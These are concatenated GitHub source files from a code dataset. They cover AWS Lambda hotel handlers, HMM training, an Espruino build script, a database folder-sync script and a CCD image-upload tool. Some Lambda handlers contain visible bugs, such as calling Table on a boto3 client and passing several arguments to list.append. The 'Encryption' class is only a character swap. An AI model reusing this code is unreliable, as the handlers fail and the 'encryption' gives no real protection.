rate_payload.get(\"hotel_ids\")\n\n return {\"message\": rate_plans}\n\n\nMAX_SEARCH_RESULTS = 5\nMAX_SEARCH_RADIUS = 10\ndynamodb = boto3.client(\"dynamodb\")\ntable = dynamodb.Table(\"geo\")\n\n\n@dataclass\nclass GeoPoint:\n hotelId: str\n lat: float\n lon: float\n\n\ndef _dist(lat1, long1, lat2, long2):\n \"\"\"\n Calculate the great circle distance between two points\n on the earth (specified in decimal degrees)\n\n Taken from: https://medium.com/analytics-vidhya/finding-nearest-pair-of-latitude-and-longitude-match-using-python-ce50d62af546\n \"\"\"\n # convert decimal degrees to radians\n lat1, long1, lat2, long2 = map(radians, [lat1, long1, lat2, long2])\n # haversine formula\n dlon = long2 - long1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n # Radius of earth in kilometers is 6371\n km = 6371 * c\n return km\n\n\n# 31 lines, 10 NAP\ndef geo_handler(event, context):\n lat = event[\"lat\"]\n lon = event[\"lon\"]\n\n try:\n response = table.get_item(Key={\"geo_points\": \"geo_points\"}) # Global key\n except ClientError as e:\n return {\"message\": \"geo points not found\"}\n else:\n geo_points_raw = json.loads(response[\"Item\"])\n geo_points = []\n for geo_point in geo_points_raw:\n geo_points.append(\n GeoPoint(geo_point[\"hotelId\"], geo_point[\"lat\"], geo_point[\"lon\"])\n )\n\n all_distances = [\n (point.hotelId, _dist(point.lat, point.lon, float(lat), float(lon)))\n for point in geo_points\n ]\n # This is quite inefficient for large lists, but we can improve it later.\n all_distances = [dist for dist in all_distances if dist[1] <= MAX_SEARCH_RADIUS]\n all_distances.sort(key=lambda x: x[1], reverse=False)\n\n limit_distances = all_distances[0:MAX_SEARCH_RESULTS]\n\n return {\"message\": list([x[0] for x in limit_distances])}\n\n\ndynamodb = boto3.client(\"dynamodb\")\ntable = dynamodb.Table(\"profile\")\n\n\n@dataclass\nclass Address:\n\n streetNumber: str\n streetName: str\n city: str\n state: str\n country: str\n postalCode: str\n lat: float\n lon: float\n\n\n@dataclass\nclass HotelProfile:\n id: str\n name: str\n phoneNumber: str\n description: str\n address: Address\n\n\n# 33 LOC, 12 NAP\ndef profile_handler(event, context):\n hotel_ids = event[\"hotel_ids\"]\n\n try:\n response = table.batch_get_item(Keys={\"hotels\": hotel_ids})\n except ClientError as e:\n return {\"message\": \"hotels not found\"}\n else:\n hotels: List[HotelProfile] = []\n\n for h_ser in response.items():\n h = json.loads(h_ser)\n hotels.append(\n HotelProfile(\n h[\"id\"],\n h[\"name\"],\n h[\"phoneNumber\"],\n h[\"description\"],\n Address(\n h[\"streetNumber\"],\n h[\"streetName\"],\n h[\"city\"],\n h[\"state\"],\n h[\"country\"],\n h[\"postalCode\"],\n h[\"lat\"],\n h[\"lon\"],\n ),\n )\n )\n return {\"message\": hotels}\n\n\n@dataclass\nclass RoomType:\n bookableRate: int\n code: str\n description: str\n totalRate: int\n totalRateInclusive: int\n\n\n@dataclass\nclass RatePlan:\n\n hotelId: str\n code: str\n inDate: str\n outDate: str\n roomType: RoomType\n\n\ndynamodb = boto3.client(\"dynamodb\")\ntable = dynamodb.Table(\"rate\")\n\n# 30 LOC, 13 NAP\ndef rate_handler(event, context):\n hotel_ids = event[\"hotel_ids\"]\n\n try:\n response = table.batch_get_item(Keys={\"hotels\": hotel_ids})\n except ClientError as e:\n return {\"message\": \"hotels not found\"}\n else:\n hotels: List[RatePlan] = []\n\n for h_ser in response.items():\n h = json.loads(h_ser)\n hotels.append(\n RatePlan(\n h[\"hotelId\"],\n h[\"code\"],\n h[\"inDate\"],\n h[\"outDate\"],\n RoomType(\n h[\"bookableRate\"],\n h[\"code\"],\n h[\"description\"],\n h[\"totalRate\"],\n h[\"totalRateInclusive\"],\n ),\n )\n )\n return {\"message\": hotels}\n\n\n@dataclass\nclass HotelRecommend:\n hotelId: str\n lat: float\n lon: float\n rate: float\n price: float\n\n\nclass RecommendType(Enum):\n DISTANCE = \"DISTANCE\"\n RATE = \"RATE\"\n PRICE = \"PRICE\"\n\n\ndynamodb = boto3.client(\"dynamodb\")\ntable = dynamodb.Table(\"recommend\")\n\n# 54 LOC, 14 NAC\ndef recommend_handler(event, context):\n recommend_params = event[\"recommend_params\"]\n recommend_type = RecommendType.value(event[\"recommend_type\"])\n hotel_ids = event[\"hotel_ids\"]\n\n try:\n response = table.batch_get_item(Keys={\"hotels\": hotel_ids})\n except ClientError as e:\n return {\"message\": \"hotels not found\"}\n else:\n hotels: List[HotelProfile] = []\n\n for h_ser in response.items():\n h = json.loads(h_ser)\n hotels.append(h[\"hotelId\"], h[\"lat\"], h[\"lon\"], h[\"rate\"], h[\"price\"])\n\n if recommend_type == RecommendType.DISTANCE:\n # Hotels with minimal distance.\n\n lat: float = recommend_params[\"lat\"]\n lon: float = recommend_params[\"lon\"]\n\n min_dist: float = sys.float_info.max\n return_hotels: List[str] = []\n for hotel in hotels:\n dist: float = _dist(lat, lon, hotel.lat, hotel.lon)\n\n if dist < min_dist:\n min_dist = dist\n\n for hotel in hotels:\n dist: float = _dist(lat, lon, hotel.lat, hotel.lon)\n\n if dist == min_dist:\n return_hotels.append(hotel.hotelId)\n return {\"message\": return_hotels}\n\n elif recommend_type == RecommendType.RATE:\n # Hotels with maximum rate.\n max_rate: float = 0\n\n for hotel in hotels:\n rate: int = hotel.rate\n\n if rate > max_rate:\n max_rate = rate\n\n return {\n \"message\": [hotel.hotelId for hotel in hotels if hotel.rate == max_rate]\n }\n elif recommend_type == RecommendType.PRICE:\n # Hotels with minimal price.\n min_price: float = sys.float_info.max\n\n for hotel in hotels:\n if hotel.price < min_price:\n min_price = hotel.price\n\n return {\n \"message\": [hotel.hotelId for hotel in hotels if hotel.price == min_price]\n }\n\n\n@dataclass\nclass HotelReservation:\n\n customerId: str\n inDate: datetime\n outDate: datetime\n numberOfRooms: int\n\n def has_date_conflict(self, in_date: datetime, out_date: datetime) -> bool:\n return in_date <= self.outDate and out_date >= self.inDate\n\n\ndef check_availability(\n reservations: List[HotelReservation],\n max_capacity: int,\n in_date: str,\n out_date: str,\n number_of_rooms: int,\n) -> bool:\n in_date = datetime.strptime(in_date, \"%Y-%m-%d\")\n out_date = datetime.strptime(out_date, \"%Y-%m-%d\")\n\n current_capacity: int = sum(\n [\n reserve.numberOfRooms\n for reserve in reservations\n if reserve.has_date_conflict(in_date, out_date)\n ]\n )\n return not (current_capacity + number_of_rooms > max_capacity)\n\n\ndynamodb = boto3.client(\"dynamodb\")\ntable = dynamodb.Table(\"hotel\")\n\n# 60 LOC, 29 NAP\ndef reserve_handler(event, context):\n hotel_id = event[\"hotel_id\"]\n\n # Load hotel\n try:\n response = table.get_item(Keys={\"hotel\": hotel_id})\n except ClientError as e:\n return {\"message\": \"hotel not found\"}\n else:\n hotel_reservations: List[HotelReservation] = []\n h = json.loads(response[\"Item\"])\n max_capacity = h[\"max_capacity\"]\n\n for r in h[\"reservations\"]:\n hotel_reservations.append(\n r[\"customerId\"], r[\"inDate\"], r[\"outDate\"], r[\"numberOfRooms\"]\n )\n\n if event[\"type\"] == \"AVAILABILITY\":\n return {\n \"message\": check_availability(\n hotel_reservations,\n max_capacity,\n event[\"in_date\"],\n event[\"out_date\"],\n event[\"number_of_rooms\"],\n )\n }\n elif event[\"type\"] == \"RESERVE_ROOM\":\n if not check_availability(\n hotel_reservations,\n max_capacity,\n event[\"in_date\"],\n event[\"out_date\"],\n event[\"number_of_rooms\"],\n ):\n return {\"message\": False}\n\n in_date = datetime.strptime(event[\"in_date\"], \"%Y-%m-%d\")\n out_date = datetime.strptime(event[\"out_date\"], \"%Y-%m-%d\")\n\n hotel_reservations.append(\n HotelReservation(\n event[\"customer_name\"], in_date, out_date, event[\"number_of_rooms\"]\n )\n )\n reservations = []\n for r in hotel_reservations:\n reservations.append(\n {\n \"customerId\": r.customerId,\n \"inDate\": r.inDate,\n \"outDate\": r.outDate,\n \"number_of_rooms\": r.numberOfRooms,\n }\n )\n table.put_item(\n Item={\n \"hotel_id\": hotel_id,\n \"max_capacity\": max_capacity,\n \"reservations\": reservations,\n }\n )\n\n return {\"message\": True}\n","repo_name":"delftdata/stateflow-evaluation","sub_path":"alternative/aws_lambda_alt.py","file_name":"aws_lambda_alt.py","file_ext":"py","file_size_in_byte":11175,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"27864689777","text":"from __future__ import division\r\nimport numpy as np\r\nfrom hmmlearn import hmm, base\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport sklearn.cluster\r\n\r\n\r\ndef seq_likelihood(seq, n = 3):\r\n if not isinstance(seq, np.ndarray):\r\n seq = np.array(seq)\r\n seq = seq[abs(seq)!=np.inf]\r\n if len(seq) < n:\r\n lh = np.mean(seq)\r\n else:\r\n tmp = np.zeros(len(seq)-n+1)\r\n for i in range(tmp.size):\r\n tmp[i] = np.mean(seq[i:i+n])\r\n lh = np.amin(tmp)\r\n return lh\r\n\r\ndef KMeans_test(kmeans, test_vts):\r\n if not isinstance(test_vts, np.ndarray):\r\n test_vts = np.array(test_vts)\r\n test_labels = kmeans.predict(test_vts[:,:-1])\r\n return test_labels\r\n\r\ndef KMeans_postures(train_vts, k):\r\n if not isinstance(train_vts, np.ndarray):\r\n train_vts = np.array(train_vts)\r\n kmeans = sklearn.cluster.KMeans(n_clusters = k).fit(train_vts[:,:-1])\r\n print('kmeans dimension: %d' % (kmeans.cluster_centers_.shape[1]))\r\n return kmeans.cluster_centers_, kmeans.labels_, kmeans\r\n\r\ndef train_hmm(input_data, state_num, obs_num):\r\n '''convert data to appropriate form'''\r\n data = np.array([]).reshape(-1)\r\n obs_lengths = []\r\n for vt in input_data:\r\n data = np.concatenate((data, vt.reshape(-1)), axis = 0)\r\n obs_lengths.append(len(vt))\r\n '''random weight initialization'''\r\n prior0 = np.zeros([1, state_num])\r\n prior0[0,0] = 1.\r\n transmat0 = np.random.rand(state_num, state_num)\r\n obsmat0 = np.random.rand(state_num, obs_num)\r\n '''specify structure'''\r\n for i in range(state_num):\r\n for j in range(state_num):\r\n if (j-i) not in [0, 1]:\r\n transmat0[i,j] = 0\r\n transmat0 = normalize_transmat(transmat0)\r\n obsmat0 = normalize_transmat(obsmat0)\r\n '''training'''\r\n model = hmm.MultinomialHMM(n_components = state_num, n_iter = 50)\r\n model.n_features = obs_num\r\n model.startprob_ = prior0\r\n model.transmat_ = transmat0\r\n model.emissionprob_ = obsmat0\r\n data = LabelEncoder().fit_transform(data)\r\n model.fit(np.atleast_2d(data).T, lengths = np.array(obs_lengths).reshape(-1))\r\n return model\r\n\r\n'''sum each row is 1'''\r\ndef normalize_transmat(transmat):\r\n new_transmat = np.array([list(row/sum(row)) for row in transmat])\r\n return new_transmat\r\n \r\n","repo_name":"nguyetn89/skeleton-HMM","sub_path":"func_HMM.py","file_name":"func_HMM.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"72699638013","text":"class Encryption:\r\n def __init__(self, message, key, user):\r\n self.message = message.lower()\r\n self.key = key\r\n self.user = user\r\n encrypting = dict(zip(self.key, self.key[::-1]))\r\n encrypted_message = \"\".join(encrypting[letters] for letters in message)\r\n # noinspection PyRedundantParentheses\r\n print(f\"Encrypted Message - \", (encrypted_message))\r\n decrypted_message = \"\".join(encrypting[letters] for letters in encrypted_message)\r\n # noinspection PyRedundantParentheses\r\n print(f\"Decrypted Message - \", (decrypted_message))\r\n print(f''+self.user+\" exited Successfully\")\r\n\r\n\r\ndef encrypt(userid):\r\n user = userid\r\n Encryption_message = input(\"Enter Your message : \")\r\n E_key = open(\"key.key\", \"rb\")\r\n Encryption_key = E_key.read().decode('utf-8')\r\n E_key.close()\r\n Encryption(Encryption_message, Encryption_key, user)\r\n","repo_name":"saravanan-sathiyamoorthi/encryption","sub_path":"encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30476246758","text":"import subprocess;\nimport re;\nimport json;\nimport sys;\nimport os;\nsys.path.append(\".\");\nimport common\n\n# Scans files for comments of the form /*JSON......*/ and then builds a tree structure of ifs to\n# efficiently detect the symbols without using RAM. See common.py for formatting\n\njsondatas = common.get_jsondata(False)\nincludes = common.get_includes_from_jsondata(jsondatas)\n\n# ------------------------------------------------------------------------------------------------------\n\ndef addToTree(tree, name, jsondata):\n if len(name)==0:\n if \"\" in tree: tree[\"\"].append(jsondata)\n else: tree[\"\"] = [ jsondata ]\n else:\n firstchar = name[:1]\n if not firstchar in tree: tree[firstchar] = {}\n addToTree(tree[firstchar], name[1:], jsondata)\n\n# ------------------------------------------------------------------------------------------------------\n# Creates something like 'name[0]=='s' && name[1]=='e' && name[2]=='t' && name[3]==0'\ndef createStringCompare(varName, checkOffsets, checkCharacters):\n checks = []\n # if we're doing multiple checks, batch up into int compare\n while len(checkOffsets)>3:\n checkOffset = checkOffsets.pop(0)\n checkOffsets.pop(0)\n checkOffsets.pop(0)\n checkOffsets.pop(0)\n checkWC = [checkCharacters.pop(0),checkCharacters.pop(0),checkCharacters.pop(0),checkCharacters.pop(0)]\n checks.append(\"(*(unsigned int*)&\"+varName+\"[\"+str(checkOffset)+\"])==CH('\"+(\"','\".join(checkWC))+\"')\")\n # finish up with single checks\n while len(checkOffsets)>0:\n checkOffset = checkOffsets.pop(0)\n checkCharacter = checkCharacters.pop(0)\n checks.append(varName+\"[\"+str(checkOffset)+\"]=='\"+checkCharacter+\"'\")\n return \" && \".join(checks)\n# ------------------------------------------------------------------------------------------------------\n\ndef getTestFor(className, static):\n if static:\n #return 'jsvIsStringEqual(parentName, \"'+className+'\")'\n n = 0;\n # IMPORTANT - we expect built-in objects to have their name stored\n # as a string in the varData element\n #checkOffsets = []\n #checkCharacters = []\n #for ch in className:\n # checkOffsets.append(n)\n # checkCharacters.append(ch)\n # n = n + 1\n #checkOffsets.append(n)\n #checkCharacters.append(\"\\\\0\")\n #return createStringCompare(\"parent->varData.str\", checkOffsets, checkCharacters)\n return \"jswIsParentNamed(parent, \\\"\"+className+\"\\\")\"\n else:\n if className==\"String\": return \"jsvIsString(parent)\"\n if className==\"Pin\": return \"jsvIsPin(parent)\"\n if className==\"Integer\": return \"jsvIsInt(parent)\"\n if className==\"Double\": return \"jsvIsFloat(parent)\"\n if className==\"Number\": return \"jsvIsInt(parent) || jsvIsFloat(parent)\"\n if className==\"Object\": return \"parent\" # we assume all are objects\n if className==\"Array\": return \"jsvIsArray(parent)\"\n if className==\"ArrayBuffer\": return \"jsvIsArrayBuffer(parent) || jsvIsArrayBufferView(parent)\"\n if className==\"Function\": return \"jsvIsFunction(parent)\"\n return \"jswHasConstructorNamed(parent, \\\"\"+className+\"\\\")\"\n #n = 0\n #checkOffsets = []\n #checkCharacters = []\n #for ch in className:\n # checkOffsets.append(n)\n # checkCharacters.append(ch)\n # n = n + 1\n #checkOffsets.append(n)\n #checkCharacters.append(\"\\\\0\")\n # return createStringCompare(\"constructorName->varData.str\", checkOffsets, checkCharacters)\n\nprint(\"Building decision tree\")\ntree = {}\nfor jsondata in jsondatas:\n if \"name\" in jsondata:\n jsondata[\"static\"] = not (jsondata[\"type\"]==\"property\" or jsondata[\"type\"]==\"method\")\n\n classTest = \"!parent\"\n if not jsondata[\"type\"]==\"constructor\":\n if \"class\" in jsondata: classTest = getTestFor(jsondata[\"class\"], jsondata[\"static\"])\n jsondata[\"classTest\"] = classTest\n # now add to tree\n addToTree(tree, jsondata[\"name\"], jsondata)\n#tree = sorted(tree, key=common.get_name_or_space)\n# ------------------------------------------------------------------------------------------------------\n#print json.dumps(tree, sort_keys=True, indent=2)\n# ------------------------------------------------------------------------------------------------------\nprint(\"Outputting decision tree\")\nwrapperFile = open('src/jswrapper.c', 'w')\n\ndef codeOut(s):\n# print str(s)\n wrapperFile.write(s+\"\\n\");\n\ndef getUnLockGetter(varType, name, funcName):\n if varType==\"float\": return \"jsvGetFloatAndUnLock(\"+name+\")\"\n if varType==\"int\": return \"jsvGetIntegerAndUnLock(\"+name+\")\"\n if varType==\"bool\": return \"jsvGetBoolAndUnLock(\"+name+\")\"\n if varType==\"pin\": return \"jshGetPinFromVarAndUnLock(\"+name+\")\"\n print(\"ERROR: getUnLockGetter: Unknown type '\"+varType+\"' for \"+funcName+\":\"+name)\n exit(1)\n\ndef getCreator(varType, value, funcName):\n if varType==\"float\": return \"jsvNewFromFloat(\"+value+\")\"\n if varType==\"int\": return \"jsvNewFromInteger(\"+value+\")\"\n if varType==\"bool\": return \"jsvNewFromBool(\"+value+\")\"\n if varType==\"JsVar\": return value\n print(\"ERROR: getCreator: Unknown type '\"+varType+\"'\"+\"' for \"+funcName)\n exit(1)\n\ndef codeOutFunctionObject(indent, obj):\n codeOut(indent+\"// Object \"+obj[\"name\"]+\" (\"+obj[\"filename\"]+\")\")\n if \"#if\" in obj: codeOut(indent+\"#if \"+obj[\"#if\"]);\n codeOut(indent+\"jspParseVariableName();\")\n codeOut(indent+\"return jspNewObject(jsiGetParser(), \\\"\"+obj[\"name\"]+\"\\\", \\\"\"+obj[\"instanceof\"]+\"\\\");\");\n if \"#if\" in obj: codeOut(indent+\"#endif //\"+obj[\"#if\"]);\n\ndef codeOutFunction(indent, func):\n if func[\"type\"]==\"object\":\n codeOutFunctionObject(indent, func)\n return\n name = \"\"\n if \"class\" in func:\n name = name + func[\"class\"]+\".\";\n name = name + func[\"name\"]\n print(name)\n codeOut(indent+\"// \"+name+\" (\"+func[\"filename\"]+\")\")\n hasThis = func[\"type\"]==\"property\" or func[\"type\"]==\"method\"\n if (\"generate\" in func) or (\"generate_full\" in func):\n argNames = [\"a\",\"b\",\"c\",\"d\"];\n params = []\n if \"params\" in func: params = func[\"params\"]\n if len(params)==0:\n if func[\"type\"]==\"variable\" or common.is_property(func):\n codeOut(indent+\"jspParseVariableName();\")\n else:\n codeOut(indent+\"jspParseEmptyFunction();\")\n elif len(params)==1 and params[0][1]!=\"JsVarName\":\n codeOut(indent+\"JsVar *\"+params[0][0]+\" = jspParseSingleFunction();\")\n elif len(params)<9:\n funcName = \"jspParseFunction8\"\n paramCount = 8\n if len(params)<5:\n funcName = \"jspParseFunction\"\n paramCount = 4\n paramDefs = []\n paramPtrs = []\n skipNames = \"0\"\n n = 0\n letters = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\"];\n for param in params:\n paramDefs.append(\"*\"+param[0])\n paramPtrs.append(\"&\"+param[0])\n if param[1]==\"JsVarName\": skipNames = skipNames + \"|JSP_NOSKIP_\"+letters[n]\n n = n + 1\n while len(paramPtrs)varData.str[0], str)==0;')\ncodeOut('}');\ncodeOut('');\ncodeOut('');\n\ncodeOut('JsVar *jswHandleFunctionCall(JsVar *parent, JsVar *parentName, const char *name) {')\ncodeOut(' switch (name[0]) {')\nfor firstChar in tree:\n codeOut(\" case '\"+firstChar+\"': {\")\n print(\"char '\"+firstChar+\"'\")\n codeOutTree(\" \", tree[firstChar], 1)\n codeOut(\" break;\");\n codeOut(\" }\")\ncodeOut(' } /*switch*/')\ncodeOut(' // Handle pin names - eg LED1 or D5 (this is hardcoded in build_jsfunctions.py)')\ncodeOut(' int pin = jshGetPinFromString(name);')\ncodeOut(' if (pin>=0) {')\ncodeOut(' jspParseVariableName();')\ncodeOut(' return jsvNewFromPin(pin);')\ncodeOut(' }')\ncodeOut(' return JSW_HANDLEFUNCTIONCALL_UNHANDLED;')\ncodeOut('}')\n\n\n#codeOut(' if (parent) {')\n#codeOut(' // ------------------------------------------ METHODS ON OBJECT')\n#if \"parent\" in tree:\n# codeOutTree(\" \", tree[\"parent\"], 0)\n#codeOut(' // ------------------------------------------ INSTANCE + STATIC METHODS')\n#for className in tree:\n# if className!=\"parent\" and className!=\"!parent\" and not \"parentName\" in className and not \"constructorName\" in className:\n# codeOut(' if ('+className+') {')\n# codeOutTree(\" \", tree[className], 0)\n# codeOut(\" }\")\n#codeOut(' // ------------------------------------------ INSTANCE METHODS WE MUST CHECK CONSTRUCTOR FOR')\n#codeOut(' JsVar *constructorName = jsvIsObject(parent)?jsvSkipOneNameAndUnLock(jsvFindChildFromString(parent, JSPARSE_CONSTRUCTOR_VAR)):0;')\n#codeOut(' if (constructorName && jsvIsName(constructorName)) {')\n#first = True\n#for className in tree:\n# if \"constructorName\" in className:\n# if first:\n# codeOut(' if ('+className+') {')\n# first = False\n# else:\n# codeOut(' } else if ('+className+') {')\n# codeOut(' jsvUnLock(constructorName);constructorName=0;')\n# codeOutTree(\" \", tree[className], 0)\n#if not first:\n# codeOut(\" } else \")\n#codeOut(' jsvUnLock(constructorName);');\n#codeOut(' }')\n#codeOut(' } else { /* if (!parent) */')\n#codeOut(' // ------------------------------------------ FUNCTIONS')\n#codeOut(' // Handle pin names - eg LED1 or D5 (this is hardcoded in build_jsfunctions.py)')\n#codeOut(' int pin = jshGetPinFromString(name);')\n#codeOut(' if (pin>=0) {')\n#codeOut(' jspParseVariableName();')\n#codeOut(' return jsvNewFromPin(pin);')\n#codeOut(' }')\n#if \"!parent\" in tree:\n# codeOutTree(\" \", tree[\"!parent\"], 0)\n#codeOut(' }');\n#codeOut(' return JSW_HANDLEFUNCTIONCALL_UNHANDLED;')\n#codeOut('}')\n#codeOut('')\n\n\n# ---------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------\nbuiltinChecks = []\nnotRealObjects = []\nfor jsondata in jsondatas:\n if \"class\" in jsondata:\n check = 'strcmp(name, \"'+jsondata[\"class\"]+'\")==0';\n if \"not_real_object\" in jsondata:\n notRealObjects.append(check)\n if not check in builtinChecks:\n builtinChecks.append(check)\n\n\ncodeOut('bool jswIsBuiltInObject(const char *name) {')\ncodeOut(' return\\n'+\" ||\\n \".join(builtinChecks)+';')\ncodeOut('}')\n\n\n","repo_name":"espruino/Espruino","sub_path":"scripts/build_jswrapper_efficient.py","file_name":"build_jswrapper_efficient.py","file_ext":"py","file_size_in_byte":14170,"program_lang":"python","lang":"en","doc_type":"code","stars":2648,"dataset":"github-code","pt":"78"} +{"seq_id":"32524235149","text":"import pyodbc\nimport os\nimport shutil\nimport ConfigParser\nimport logging\nimport logging.config\n\nlogging.config.fileConfig(\"settings.conf\")\n#create logger\nlogger = logging.getLogger(\"example\")\n\n\n#read the configuration information\nconf = ConfigParser.ConfigParser()\nconf.read('settings.conf')\n\n\n#conf.get('DB', 'server'), conf.get('DB', 'database'), conf.get('DB', 'username'), conf.get('DB', 'password')\n\nlogger.info(\"Begin to process\")\nconn_str = 'DRIVER={SQL Server};SERVER=%s;DATABASE=%s;UID=%s;PWD=%s' % (conf.get('DB','server'), conf.get('DB','database'), conf.get('DB','username'), conf.get('DB','password'))\nlogger.info(conn_str)\ncnxn = pyodbc.connect(conn_str)\ncursor = cnxn.cursor()\n\n\nserver_ip = conf.get('Settings',\"server_ip\")\ndata_folder = conf.get('Settings',\"data_folder\")\nremoved_folder = conf.get('Settings',\"removed_folder\")\n\n# get all host for the specify server\ncursor.execute(\"\"\"select distinct H.HostName from Main_HostList H, Main_Goods G, Main_Server S\n where H.GoodsNO = G.GoodsNO\n and G.ServerID = S.ServerID and S.IP=?\"\"\", server_ip)\n\nhosts = []\nfor row in cursor:\n hosts.append(row.HostName)\n\n# remove folder that has not in the db\nfor subdir in os.listdir(data_folder):\n if not subdir in hosts:\n logger.info(\"folder %s doesn't exists on db\" % subdir)\n source = data_folder + subdir\n dest = removed_folder + subdir\n shutil.move(source, dest)\n\nlogger.info(\"Finished\")\n\n","repo_name":"chenboxing/PyDataSync","sub_path":"virhost_sync.py","file_name":"virhost_sync.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40115229609","text":"#!/usr/bin/env python\n\nfrom __future__ import annotations\nimport abc\nimport argparse\nfrom datetime import datetime, timedelta\nimport functools\nimport logging\nimport os\nfrom pathlib import Path\nimport re\nimport socket\nimport subprocess\nimport tempfile\nimport time\nfrom urllib3.connection import HTTPConnection\n\n\ndef build_parser() -> argparse.ArgumentParser:\n \"\"\"Build an argument parser for command-line options.\"\"\"\n\n parser = argparse.ArgumentParser(\n description=\"Transfer a stream of CCD images.\"\n )\n parser.add_argument('-d', '--destination', metavar='URL', required=True,\n help=(\"URL with\"\n \" gsapi, boto, minio, https, http, bbcp, scp\"\n \" scheme\"))\n parser.add_argument('-s', '--starttime', metavar='HH:MM', required=True,\n help=\"local time to start simulation\")\n parser.add_argument('-n', '--numexp', metavar='EXPOSURES', type=int,\n required=True, help=\"number of exposures to simulate\")\n parser.add_argument('-c', '--ccds', metavar='CCDS', type=int,\n default=1, help=\"number of CCDs to simulate\")\n parser.add_argument('-i', '--interval', type=int, default=17,\n help=\"interval between exposures in sec\")\n parser.add_argument('-I', '--inputfile', type=Path,\n default=\"./data/S00.fits\", help=\"input directory\")\n parser.add_argument('-t', '--tempdir', type=Path, default=\"/tmp\",\n help=\"temporary directory\")\n parser.add_argument('-z', '--compress', action='store_true',\n help=\"compress before transfer\")\n parser.add_argument('-P', '--private', action='store_true',\n help=\"use private Google Cloud interconnect\")\n parser.add_argument('-K', '--keepalive', action='store_true',\n help=\"use TCP keepalive options\")\n return parser\n\n\nclass Waiter:\n \"\"\"Wait until the appropriate time for a given exposure.\n\n Each exposure is triggered at a given start time plus a time interval\n between exposures. These times are computed as wall-clock times rather\n than relative times to ensure consistency across multiple processes and\n computers.\n\n Parameters\n ----------\n hour, minute: `int`\n The time to start the first exposure.\n interval: `int`\n Interval between exposures in seconds.\n \"\"\"\n\n def __init__(self, hour: int, minute: int, interval: int):\n self.base_time = datetime.now().replace(hour=hour, minute=minute,\n second=0, microsecond=0)\n self.interval = interval\n\n def wait_exposure(self, num: int):\n \"\"\"Wait for the given exposure number.\n\n Parameters\n ----------\n num: `int`\n Number of the exposure to wait for.\n \"\"\"\n when = self.base_time + timedelta(seconds=num * self.interval)\n delay = (when - datetime.now()).total_seconds()\n delay_str = f\"{abs(delay)} seconds for exposure {num} at {when}\"\n if delay < 0:\n logging.info(\"Late \" + delay_str)\n return\n logging.info(\"Sleeping \" + delay_str)\n time.sleep(delay)\n\n\ndef log_timing(func):\n \"\"\"Decorator to log timing information for a function.\"\"\"\n\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n logging.info(f\"Start {func.__name__}\")\n start = time.time()\n try:\n res = func(self, *args, **kwargs)\n finally:\n delta = time.time() - start\n logging.info(f\"End {func.__name__} = {delta}\")\n return res\n\n return wrapper\n\n\n@log_timing\ndef copy(source: Path, temp: Path, dest: Path, compress: bool = False) -> Path:\n \"\"\"Copy a file to a temporary location, optionally with compression.\n\n Parameters\n ----------\n source: `pathlib.Path`\n Source file location.\n temp: `pathlib.Path`\n Temporary directory to which to copy the file.\n Intended to ensure that transfers come from RAM rather than disk.\n dest: `pathlib.Path`\n Destination location within temporary directory.\n compress: `bool`, optional\n Compress the file with fpack if true.\n\n Returns\n -------\n finaldest: `pathlib.Path`\n Destination location updated with compression suffix if appropriate.\n \"\"\"\n (temp / dest).parent.mkdir(parents=True, exist_ok=True)\n logging.info(f\"Copying {source} to {temp / dest}\")\n subprocess.run([\"cp\", f\"{source}\", f\"{temp / dest}\"])\n if compress:\n logging.info(f\"Compressing {temp / dest}\")\n subprocess.run([\"fpack\", f\"{temp / dest}\"])\n dest = dest.with_suffix(\".fits.fz\")\n return dest\n\n\nclass Uploader(abc.ABC):\n \"\"\"Abstract base class for classes that upload files from the camera.\"\"\"\n\n @classmethod\n def create(cls, dest: str) -> Uploader:\n \"\"\"Create an Uploader based on the scheme of its destination URI.\n\n Parameters\n ----------\n dest: `str`\n Destination URI.\n\n Returns\n -------\n uploader: `Uploader`\n Instance of the Uploader class configured for transfers.\n \"\"\"\n logging.info(f\"Creating uploader for {dest}\")\n if dest.startswith(\"gsapi://\"):\n return GsapiUploader(dest[len(\"gsapi://\"):])\n if dest.startswith(\"boto://\"):\n return GsapiUploader(dest[len(\"boto://\"):])\n if dest.startswith(\"minio://\"):\n return GsapiUploader(dest[len(\"minio://\"):])\n if dest.startswith(\"https://\") or dest.startswith(\"http://\"):\n return HttpUploader(dest)\n if dest.startswith(\"bbcp://\"):\n return HttpUploader(dest[len(\"bbcp://\"):])\n if dest.startswith(\"scp://\"):\n return ScpUploader(dest[len(\"scp://\"):])\n raise RuntimeError(f\"Unrecognized URL {dest}\")\n\n def transfer(self, temp_dir: Path, source: Path):\n \"\"\"Main method for transferring files.\n\n Implemented by subclasses.\n\n Destination is set by URI plus the result of the `copy` function.\n\n Parameters\n ----------\n temp_dir: `pathlib.Path`\n Temporary directory to use during transfer.\n source: `pathlib.Path`\n Source file to transfer.\n \"\"\"\n raise NotImplementedError(\"transfer not implemented\")\n\n\nclass GsapiUploader(Uploader):\n \"\"\"Uploader using the Google Cloud Storage API.\"\"\"\n\n def __init__(self, dest: str):\n from google.cloud import storage\n if \"/\" in dest:\n bucket, self.prefix = dest.split(\"/\", 1)\n else:\n bucket = dest\n self.prefix = \"\"\n logging.info(f\"gsapi: opening bucket {bucket}\"\n f\", saving prefix '{self.prefix}'\")\n self.bucket = storage.Client().bucket(bucket)\n try:\n # Download something to \"prime\" the connection.\n # Might be better to upload something instead.\n _ = self.bucket.blob(\".null\").download_as_string()\n except Exception as exc:\n logging.info(f\"Ignored: {exc}\")\n\n @log_timing\n def transfer(self, temp_dir: Path, source: Path):\n logging.info(f\"gsapi: uploading to 